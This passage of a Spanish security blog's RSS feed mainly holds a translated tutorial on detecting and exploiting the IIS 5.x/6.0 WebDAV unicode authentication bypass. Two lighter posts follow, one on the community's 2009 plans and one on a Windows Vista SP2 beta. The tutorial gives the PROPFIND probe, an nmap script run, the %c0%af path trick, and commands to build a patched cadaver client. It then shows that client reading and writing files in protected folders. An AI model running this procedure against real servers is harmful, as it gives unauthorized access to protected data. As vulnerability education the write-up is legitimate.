<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/seguridad-informatica-con-software-libre.xhtml" title="Seguridad Informática con Software Libre">Seguridad Informática con Software Libre</a></li><li><a href="http://www.dragonjar.org/olpc-y-sugar-en-colombia.xhtml" title="OLPC y Sugar en Colombia">OLPC y Sugar en Colombia</a></li><li><a href="http://www.dragonjar.org/cronica-barcamp-medellin-2009.xhtml" title="Crónica sobre BarCamp Medellín 2009">Crónica sobre BarCamp Medellín 2009</a></li><li><a href="http://www.dragonjar.org/segurisemanal-ii.xhtml" title="SeguriSemanal II">SeguriSemanal II</a></li><li><a href="http://www.dragonjar.org/antesala-de-barcamp-medellin-2009.xhtml" title="Antesala de BarCamp Medellín 2009">Antesala de BarCamp Medellín 2009</a></li><li><a href="http://www.dragonjar.org/analisis-fallo-generador-numeros-aleatorios-openssl-bian.xhtml" title="Análisis del Fallo en el Generador de Números Aleatorios de OpenSSL/Debian">Análisis del Fallo en el Generador de Números Aleatorios de OpenSSL/Debian</a></li><li><a href="http://www.dragonjar.org/combat-training-v2-0-en-colombia.xhtml" title="COMBAT Training v2.0 en Colombia">COMBAT Training v2.0 en Colombia</a></li><li><a href="http://www.dragonjar.org/el-futuro-de-la-industria-de-la-seguridad-informatica.xhtml" title="El futuro de la industria de la Seguridad Informática">El futuro de la industria de la Seguridad Informática</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/barcamp-medellin.xhtml/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Detección de WebDAV, verificación de la vulnerabilidad y explotación</title>
		<link>http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml</link>
		<comments>http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml#comments</comments>
		<pubDate>Mon, 01 Jun 2009 21:13:48 +0000</pubDate>
		<dc:creator>Cortex</dc:creator>
				<category><![CDATA[Artículos sobre seguridad]]></category>
		<category><![CDATA[COMOs]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Exploits]]></category>
		<category><![CDATA[IIS]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[WebDAV]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=2419</guid>
		<description><![CDATA[En SkullSecurity han publicado un interesante artículo (creado por Andrew) en el que muestran como llevar a cabo el proceso de explotación de la tan renombrada vulnerabilidad de WebDAV en los servidores IIS 6.0/5.0 descubierta el mes pasado, la cual permite acceder a directorios protegidos con contraseña debido al mal filtrado que se hace del [...]]]></description>
			<content:encoded><![CDATA[<p>En <a rel="nofollow" target="_blank" title="WebDAV Detection, Vulnerability Checking and Exploitation" href="http://www.skullsecurity.org/blog/?p=285">SkullSecurity</a> han publicado un interesante artículo (creado por <strong>Andrew</strong>) en el que muestran como llevar a cabo el proceso de explotación de la tan renombrada <a rel="nofollow" target="_blank" title="Understanding Microsoft's KB971492 IIS5/IIS6 WebDAV Vulnerability" href="http://unixwiz.net/techtips/ms971492-webdav-vuln.html">vulnerabilidad de <strong>WebDAV</strong> en los servidores <strong>IIS 6.0/5.0</strong></a> descubierta el mes pasado, la cual permite acceder a directorios protegidos con contraseña debido al mal filtrado que se hace del caracter unicode <em> %c0%a. </em></p>
<p>El artículo se encuentra en Inglés pero he decidido realizar la <strong>traducción</strong> para que nuestro público hispano también pueda tener acceso a este buen contenido. Se hace uso de la herramienta <a rel="nofollow" target="_blank" title="El Libro de Nmap" href="http://www.dragonjar.org/el-libro-de-nmap.xhtml"><strong>Nmap</strong></a> para detectar si el servidor es vulnerable y luego por medio de una versión de <a title="cadaver WebDAV" href="http://www.webdav.org/cadaver/"><strong>cadaver</strong></a> parcheada se realiza la explotación.</p>
<p><span id="more-2419"></span></p>
<h2>Detección de WebDAV, verificación de la vulnerabilidad y explotación</h2>
<p>La primera cosa que deberías saber al jugar con esta vulnerabilidad es que el servidor IIS no es explotable sí el directorio raiz está protegido. También si el directorio raiz está protegido, no hay manera de determinar ni siquiera si <a title="Detección de WebDAV, verificación de la vulnerabilidad y explotación" href="http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml">WebDAV</a> está activado. Siendo dicho eso, si el directorio raiz _no_ está protegido entonces es hora de divertirnos un poco.</p>
<h2>Detectando sí WebDAV está activado</h2>
<p><strong>Las pruebas han sido realizadas en:</strong></p>
<ul>
<li>IIS 6.0/Windows 2003 Enterprise SP2</li>
<li>IIS 5.1/Windows XP Pro SP2</li>
<li>IIS 5.0/Windows 2000 SP4</li>
</ul>
<p>En IIS 6-.0, WebDAV está desactivado por defecto. En IIS 5.0 y 5.1, WebDAV está activado por defecto y se debe editar el registro para desactivarlo.</p>
<p>Mi método de detección simplista requiere de ejecutar una petición <strong>PROPFIND</strong> en el servidor. Básicamente es la misma petición PROPFIND usada en el script <em><strong>http-iis-webdav-vuln.nse</strong></em>:</p>
<p style="padding-left: 30px;"><code>PROPFIND / HTTP/1.1<br />
Host: xxx.xxx.xxx.xxx<br />
Content-Type: application/xml<br />
Content-Length: 298</code></p>
<p style="padding-left: 30px;">&lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;utf-8&#8243;?&gt;<br />
&lt;propfind xmlns=&#8221;DAV:&#8221;&gt;<br />
&lt;prop&gt;<br />
&lt;getcontentlength xmlns=&#8221;DAV:&#8221;/&gt;<br />
&lt;getlastmodified xmlns=&#8221;DAV:&#8221;/&gt;<br />
&lt;executable xmlns=&#8221;http://apache.org/dav/props/&#8221;/&gt;<br />
&lt;resourcetype xmlns=&#8221;DAV:&#8221;/&gt;<br />
&lt;checked-in xmlns=&#8221;DAV:&#8221;/&gt;<br />
&lt;checked-out xmlns=&#8221;DAV:&#8221;/&gt;<br />
&lt;/prop&gt;<br />
&lt;/propfind&gt;</p>
<p>Cuando <strong>WebDAV está activado</strong>, debería devolver <em><strong>&#8220;HTTP/1.1 207 Multi-Status&#8221;</strong></em>.<br />
Cuando <strong>WebDAV ha sido desactivado</strong>, debería retornar <em><strong>&#8220;HTTP/1.1 501 Not Supported&#8221;</strong></em>.</p>
<p>Éste es el método que he implementado en el script http-iis-webdav-vuln.nse. Funciona muy bien en el laboratorio con los servidores IIS. Si recibimos alguna otra cosa diferente a 207 o 501 entonces abordamos el barco diciendo que el servidor no está soportado. Por otrolado, un servidor Aparche corriendo sobre Ubuntu devolvería un 405 Method Not Allowed.</p>
<h2>Verificando si un servidor es vulnerable</h2>
<p><strong>Las pruebas han sido realizadas en:</strong></p>
<ul>
<li>IIS 6.0/Windows 2003 Enterprise SP2</li>
<li>IIS 5.1/Windows XP Pro SP2</li>
</ul>
<p><strong>No funciona en:</strong></p>
<ul>
<li>IIS 5.0/Windows 2000 SP4</li>
</ul>
<p>El script original sólo usaba un forma para verificar; primero encontraría un directorio protegido (<em>/secret/</em>) y luego probaría intentando el caracter <em>%c0%af</em> después del primer /. Entonces <em>/secret/</em> se convertiría en <em>/%c0%afsecret/</em>.</p>
<p>Funcionó muy bien en IIS 6.0 pero no funcionó del todo en IIS 5.0/5.1. Después jugar un poco más hoy con esto, logramos hacerlo funcionar en IIS 5.1. El problema con el 5.1 es que el caracter <em>%c0%af</em> no puede estar justo antes de / pero sí en alguna parte entre el nombre del directorio. También funcionó en IIS 6.0. Modifiqué el script de manera que usara la verificación de IIS 5.0/6.0, convirtiendo <em><strong>/secret/</strong></em> en <strong><em>/s%c0%afecret/</em></strong>.</p>
<h2>Encontrando un servidor vulnerable</h2>
<p><strong>Las pruebas han sido realizadas en:</strong></p>
<ul>
<li>IIS 6.0/Windows 2003 Enterprise SP2</li>
<li>IIS 5.1/Windows XP Pro SP2</li>
</ul>
<p><strong>No funciona en:</strong></p>
<ul>
<li>IIS 5.0/Windows 2000 SP4</li>
</ul>
<p>Ahora vamos a la parte divertida. Si hasta ahora no te has divertido, vete preparando por que ya casi llegamos!</p>
<p>Lo primero que necesitamos hacer es encontrar un servidor vulnerable. Sólo llegué a saber de un Windows 2003 en mi laboratorio corriendo IIS 6.0 que es vulnerable (actualizado y parcheado hasta la fecha). Veamos funciona como un escaneo con nmap en este sistema con el script actualizado:</p>
<p style="padding-left: 30px;">&gt; ./nmap -T4 -p80 &#8211;script=http-iis-webdav-vuln xxx.xxx.xxx.xxx</p>
<p style="padding-left: 30px;">Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-20 14:29 CDT<br />
Interesting ports on xxx.xxx.xxx.xxx:<br />
PORT   STATE SERVICE<br />
80/tcp open  http<br />
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /secret, /webdav</p>
<p style="padding-left: 30px;">Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds</p>
<p>Interesante! Ahora sabemos que el servidor tiene WebDAV activado y hay 3 directorios vulnerables.</p>
<h2>Explotándolo!</h2>
<p>Ahora podríamos hacer lo que sea haciendo uso de telnet por el puerto 80, pero no es muy divertido (creeme, es muy tedioso!) así que busqué un cliente WebDAV. Me tropecé con un software libre llamado <a rel="nofollow" target="_blank" title="cadaver WebDAV" href="http://www.webdav.org/cadaver/">cadaver</a>, y basado únicamente en el nombre lo descargué. Cadaver por sí mismo es un gran cliente WebDAV de línea de comandos pero rápidamente me dí cuenta que tiene un montón de problemas que no nos dejarían hacer lo que queríamos. Lo bueno del software libre es que es abierto, así que descargué el <a rel="nofollow" target="_blank" title="cadaver-0.23.2.tar.gz" href="http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz">código fuente de cadaver-0.23.2</a> y después de modificarlo un poco, resultamos con un <a rel="nofollow" target="_blank" title="cadaver-0.23.2-h4x.patch" href="http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch">pequeño parche</a> que hace bastante sencillo explotar un servidor. Revisa el parche por ti mismo para ver detalles a fondo pero básicamente hace lo siguiente:</p>
<p>1. Reemplazar cualquier cabecera &#8220;Depth: 0&#8243; por &#8220;Depth: 1&#8243; (de otro modo LS no funcionaría)<br />
2. Agregar la cabecera &#8220;Translate: f&#8221; a cada petición (de otra manera GET y probablemente otros no funcionarían.<br />
3. Insertar los caracteres &#8220;%c0%af&#8221; en cualquier petición con más de 1 caracter.</p>
<p>Así que baja el parche <a rel="nofollow" target="_blank" href="http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch"><strong>cadaver-0.23.2-h4x.patch</strong></a> y apĺícalo a la <strong>fuentes de cadaver-0.23.2</strong> desde el <a rel="nofollow" target="_blank" title="cadaver WebDAV" href="http://www.webdav.org/cadaver/">sitio web de cadaver</a>. Aquí están los comandos:<code><br />
</code></p>
<p style="padding-left: 30px;">&gt; mkdir cadaver-h4x<br />
&gt; cd cadaver-h4x<br />
&gt; wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch<br />
&#8211;recortado&#8211;<br />
&gt; wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz<br />
&#8211;recortado&#8211;<br />
&gt; tar xzvf cadaver-0.23.2.tar.gz<br />
&#8211;recortado&#8211;<br />
&gt; cd cadaver-0.23.2/<br />
&gt; patch -p1 &lt; ../cadaver-0.23.2-h4x.patch<br />
patching file lib/neon/ne_basic.c<br />
patching file lib/neon/ne_request.c<br />
patching file lib/neon/ne_uri.c<br />
&gt; ./configure<br />
&#8211;recortado&#8211;<br />
&gt; make<br />
&#8211;recortado&#8211;</p>
<p>Ahora deberíamos de tener una versión parcheada y compilada de cadaver. Iníciala con el servidor que habías identificado con directorios vulnerables anteriormente:</p>
<p style="padding-left: 30px;">&gt; ./cadaver xxx.xxx.xxx.xxx</p>
<p>Esto debería de dejarte en un prompt con &#8220;dav:/&gt;&#8221;. Ahora simplemente haz cd al directorio vulnerable y verifica que hay ahí:<code><br />
</code></p>
<p style="padding-left: 30px;">dav:/&gt; cd secret<br />
dav:/secret/&gt; ls<br />
Listing collection `/secret/&#8217;: succeeded.<br />
password.txt                           7  May 19 10:40<br />
dav:/secret/&gt; cat password.txt<br />
Displaying `/secret/password.txt&#8217;:<br />
ron$pr0ns<br />
dav:/secret/&gt;</p>
<p>Y ahí lo tienes!</p>
<p>Aquí tienes una lista de comandos que he probado y funcionan con cadaver parcheado en un directorio vulnerable:</p>
<ul>
<li>CD</li>
<li>LS</li>
<li>MOVE</li>
<li>PUT</li>
<li>GET</li>
<li>CAT</li>
<li>DELETE</li>
</ul>
<p>Curiosamente, el comando COPY no funciona. No hemos tenido tiempo para investigar por, pero la funcionalidad puede ser duplicada con un <strong>get/local rename/put</strong>.</p>
<p>Este cadaver parcheado tampoco funcionará para examinar directorios WebDAV regulares (no vulnerables), así que no intentes.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/video-explotando-wm-downloader.xhtml" title="Video: Explotando WM Downloader ">Video: Explotando WM Downloader </a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a href="http://www.dragonjar.org/parches-para-windows-corrigen-vulnerabilidades-criticas.xhtml" title="Parches para Windows que corrigen Vulnerabilidades Criticas">Parches para Windows que corrigen Vulnerabilidades Criticas</a></li><li><a href="http://www.dragonjar.org/denegacion-de-servicio-desde-el-wordpad.xhtml" title="Denegacion de Servicio desde el WordPad">Denegacion de Servicio desde el WordPad</a></li><li><a href="http://www.dragonjar.org/actualiza-tu-equipo-con-windows.xhtml" title="Actualiza tu equipo con Windows">Actualiza tu equipo con Windows</a></li><li><a href="http://www.dragonjar.org/video-tutorial-de-nessus-y-baseline-security-analyzer.xhtml" title="Video Tutorial de Nessus y Baseline Security Analyzer">Video Tutorial de Nessus y Baseline Security Analyzer</a></li><li><a href="http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml" title="Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;">Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;</a></li><li><a href="http://www.dragonjar.org/recogiendo-evidencias-analisis-forense-windows.xhtml" title="Recogiendo Evidencias para Análisis Forense en Windows">Recogiendo Evidencias para Análisis Forense en Windows</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/deteccion-de-webdav-verificacion-de-la-vulnerabilidad-y-explotacion.xhtml/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Nuestros propósitos para el 2009</title>
		<link>http://www.dragonjar.org/nuestros-propositos-para-el-2009.xhtml</link>
		<comments>http://www.dragonjar.org/nuestros-propositos-para-el-2009.xhtml#comments</comments>
		<pubDate>Fri, 09 Jan 2009 08:28:22 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[La Comunidad DragonJAR]]></category>
		<category><![CDATA[Proyectos]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=1790</guid>
		<description><![CDATA[Una vez realizado el resumen con lo mejor del 2008 en nuestra comunidad, se hace necesario planear el futuro de esta para el recién iniciado 2009.
La comunidad y los proyectos en conjunto prometen y comprometen trabajo constante que solo serán posibles realizar si trabajamos en equipo.
Pretendemos realizar excelentes propuestas y propósitos en este nuevo año. [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Una vez realizado el <a href="http://www.dragonjar.org/lo-mejor-del-2008.xhtml" target="_blank">resumen con lo mejor del 2008</a> en nuestra comunidad, se hace necesario planear el futuro de esta para el recién iniciado 2009.</p>
<p style="text-align: justify;">La comunidad y los proyectos en conjunto prometen y comprometen trabajo constante que solo serán posibles realizar si trabajamos en equipo.</p>
<p style="text-align: justify;"><span id="more-1790"></span>Pretendemos realizar excelentes propuestas y propósitos en este nuevo año. Entre ellas se destaca la realización de nuestra propia distribución basada en GNU/Linux &#8220;DruX&#8221;.  (<a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/drux-b2.0/" target="_blank">Más información y modos colaboración en el proyecto DruX</a>). Así mismo se espera publicar algunos números más de la bien recibida E-Zine de nuestra comunidad (<a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/ezine_comunidad_dragonjar-b4.0/" target="_blank">Más información y modos de colaboración en el proyecto E-Zine DragonJAR</a>).</p>
<p style="text-align: justify;">Se pretende además darle el enfoque y sello oficial de la comunidad a la <a rel="nofollow" target="_blank" href="http://radio.dragonjar.org/" target="_blank">Emisora DragonJAR</a>, en la cual muy pronto comenzarán las transmisiones de programas propios realizados por varios usuarios de la comunidad. (<a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/radio_dragonjar-b5.0/" target="_blank">Más información y modos de colaboración en el proyecto Radio DragonJAR</a>)</p>
<p style="text-align: justify;">Los Laboratorios también presentarán mejoras, tanto en su constancia como en su nivel técnico, pues una vez nivelados en conocimiento todos los participantes se espera realizar algunos más complejos que motiven el seguimiento de los mismos y la realización de otros laboratorios propuestos por los participantes y lectores.<br />
Pretendemos realizar algunos laboratorios presenciales en diferentes ciudades de Colombia, todo esto gracias a varios acuerdos con Universidades y organizaciones interesadas en los mismos. Así mismo esperamos realizar con mayor periodicidad los laboratorios en modo virtual, para que los usuarios e interesados de otros paises puedan ser participes de estos. (<a rel="nofollow" target="_blank" href="http://labs.dragonjar.org/infolabs" target="_blank">Más información y modos de colaboración en el proyecto Labs.DragonJAR.org</a>)</p>
<p style="text-align: justify;">Se espera además realizar algunos cursos básicos de nivelación en diferentes temas relacionados con los sistemas de información y la seguridad informática, todos ellos serán llevados a cabo sobre entornos de salones virtuales, buscando una mayor cobertura y sanar el vacio que muchos usuarios presentan frente a algunos aspectos básicos sobre estos temas. (<a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/cursos_basicos_tic-b63.0/" target="_blank">Más información y modos de colaboración en el proyecto cursos básicos TIC</a>)</p>
<p style="text-align: justify;">Estos son solo algunos de los proyectos a realizar como comunidad puedes enterarte de otros (Wiki, Canal de TV, Conferencias) participando en el <a rel="nofollow" target="_blank" href="http://comunidad.dragonjar.org/" target="_blank">foro de la comunidad</a>.</p>
<p style="text-align: justify;">A nivel personal esperamos trabajar y estudiar aun más para mejor tanto a nivel profesional como a nivel de comunidad, esperamos publicar mejor contenido en la Web y hacerlo más periodicamente. Esperamos viajar a más ciudades a diferentes eventos que nos interesan (Campus Party, Flisol, Conferencias, etc).<br />
Esperamos que el 2009 sea un año para recordar en la Comunidad DragonJAR.</p>
<p style="text-align: justify;">Y para finalizar, ¿Cuáles son tus propósitos para este nuevo año 2009?</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/ezine-comunidad-dragonjar-online.xhtml" title="Ezine Comunidad DragonJAR Online">Ezine Comunidad DragonJAR Online</a></li><li><a href="http://www.dragonjar.org/nuestros-propositos-para-el-2010.xhtml" title="Nuestros propósitos para el 2010">Nuestros propósitos para el 2010</a></li><li><a href="http://www.dragonjar.org/combat-training-v2-0-en-colombia.xhtml" title="COMBAT Training v2.0 en Colombia">COMBAT Training v2.0 en Colombia</a></li><li><a href="http://www.dragonjar.org/boletin-de-la-comunidad-dragonjar-0008.xhtml" title="Boletín de La Comunidad DragonJAR #0008">Boletín de La Comunidad DragonJAR #0008</a></li><li><a href="http://www.dragonjar.org/confirmado-el-combat-training-en-colombia.xhtml" title="Confirmado el COMBAT Training en Colombia">Confirmado el COMBAT Training en Colombia</a></li><li><a href="http://www.dragonjar.org/boletin-de-la-comunidad-dragonjar-0007.xhtml" title="Boletín de La Comunidad DragonJAR #0007">Boletín de La Comunidad DragonJAR #0007</a></li><li><a href="http://www.dragonjar.org/finaliza-plazo-para-la-entrega-de-los-informes.xhtml" title="Finaliza plazo para la entrega de los Informes">Finaliza plazo para la entrega de los Informes</a></li><li><a href="http://www.dragonjar.org/nuevo-plazo-de-entrega-para-el-reto-forense.xhtml" title="Nuevo Plazo de Entrega para el Reto Forense">Nuevo Plazo de Entrega para el Reto Forense</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/nuestros-propositos-para-el-2009.xhtml/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Descargar Windows Vista Service Pack 2</title>
		<link>http://www.dragonjar.org/descargar-windows-vista-service-pack-2.xhtml</link>
		<comments>http://www.dragonjar.org/descargar-windows-vista-service-pack-2.xhtml#comments</comments>
		<pubDate>Sat, 06 Dec 2008 16:53:44 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Descargar Windows Vista Service Pack 2]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Microsoft Windows Vista Service Pack 2]]></category>
		<category><![CDATA[SP2]]></category>
		<category><![CDATA[Vista]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=1570</guid>
		<description><![CDATA[
Aunque ya existían instrucciones para descargar la versión beta del Service Pack 2 para windows vista, solo ahora Microsoft a publicado el esta beta para todos los usuarios.
El Service Pack 2 beta mejora el sistema para creación de redes inalámbricas, la nueva versión de Windows Search 4.0, ahora es posible grabar BluRay en Windows Vista [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" src="http://img360.imageshack.us/img360/3265/wvsp2tx6.jpg" alt="Descargar Windows Vista Service Pack 2" title="Descargar Windows Vista Service Pack 2" /></p>
<p>Aunque ya existían instrucciones para descargar la versión beta del Service Pack 2 para windows vista, solo ahora Microsoft a publicado el esta beta para todos los usuarios.</p>
<p>El Service Pack 2 beta mejora el sistema para creación de redes inalámbricas, la nueva versión de Windows Search 4.0, ahora es posible grabar BluRay en Windows Vista sin necesidad de software adicional, soporte para la nueva versión de BlueTooth.<span id="more-1570"></span></p>
<p>Ya es posible descargar <a rel="nofollow" target="_blank" href="http://www.microsoft.com/downloads/details.aspx?displaylang=es&amp;FamilyID=dca54ecc-362a-4b4d-b62b-22780e839a7e" target="_blank">Service Pack 2 beta para Windows Vista</a>, aunque recuerden que es una beta y puede causar algunos problemas, aunque si tienes problemas con las redes inalámbricas o quieres las nuevas funciones es posible que instalando esta nueva actualización del sistema se solucionen los problemas.</p>
<p><a rel="nofollow" target="_blank" href="http://www.microsoft.com/downloads/details.aspx?displaylang=es&amp;FamilyID=dca54ecc-362a-4b4d-b62b-22780e839a7e" target="_blank">Descargar Windows Vista </a><a rel="nofollow" target="_blank" href="http://www.microsoft.com/downloads/details.aspx?displaylang=es&amp;FamilyID=dca54ecc-362a-4b4d-b62b-22780e839a7e" target="_blank">Service Pack 2 beta</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/nueva-versin-de-cain-abel.xhtml" title="Nueva versión de Cain &#038; Abel">Nueva versión de Cain &#038; Abel</a></li><li><a href="http://www.dragonjar.org/truco-para-poner-flip-3d-en-windows-7.xhtml" title="Truco para poner Flip 3D en Windows 7 Beta 1">Truco para poner Flip 3D en Windows 7 Beta 1</a></li><li><a href="http://www.dragonjar.org/microsoft-publica-parche-que-corrige-vulnerabilidad-critica.xhtml" title="Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;">Microsoft Publica parche que corrige Vulnerabilidad &#8220;Critica&#8221;</a></li><li><a href="http://www.dragonjar.org/guia-de-seguridad-de-windows-vista.xhtml" title="Guía de Seguridad de Windows Vista">Guía de Seguridad de Windows Vista</a></li><li><a href="http://www.dragonjar.org/ophcrack-con-soporte-para-windows-vista.xhtml" title="Ophcrack con soporte para Windows Vista ">Ophcrack con soporte para Windows Vista </a></li><li><a href="http://www.dragonjar.org/windows-vista-service-pack-1.xhtml" title="Windows Vista Service Pack 1 ">Windows Vista Service Pack 1 </a></li><li><a href="http://www.dragonjar.org/la-fortuna-del-sp1-update-rtm-bits.xhtml" title="La fortuna del SP1 Update RTM bits">La fortuna del SP1 Update RTM bits</a></li><li><a href="http://www.dragonjar.org/recuperar-contrasenas-de-windows-vista-y-anteriores.xhtml" title=" Recuperar Contraseñas de Windows 7, Vista y Anteriores"> Recuperar Contraseñas de Windows 7, Vista y Anteriores</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/descargar-windows-vista-service-pack-2.xhtml/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
